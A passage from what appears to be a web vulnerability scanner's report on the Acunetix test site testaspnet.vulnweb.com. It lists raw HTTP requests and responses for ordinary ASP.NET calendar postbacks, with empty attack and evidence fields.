advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8435&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCARcJCBtsIZGRkFjT8iF6DnUgTj28UTB4BbyTdLNA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLWwu7tBwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBfvHalVv1%2BOAhnVTuVeTl0zWe2td
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:58 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCARcJCBtsIZGRkFjT8iF6DnUgTj28UTB4BbyTdLNA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWwu7tBwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBfvHalVv1+OAhnVTuVeTl0zWe2td" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:White" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8556&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAQc5XZdsIZGRkQbCHpLJEBUgJhIzb%2Fd%2FCUBLQ1tM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLwzpjuCAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMdcyOl0xwwWbaQAJaX7EKHuc%2F69E%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:46 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAQc5XZdsIZGRkQbCHpLJEBUgJhIzb/d/CUBLQ1tM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLwzpjuCAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMdcyOl0xwwWbaQAJaX7EKHuc/69E=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:White" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted 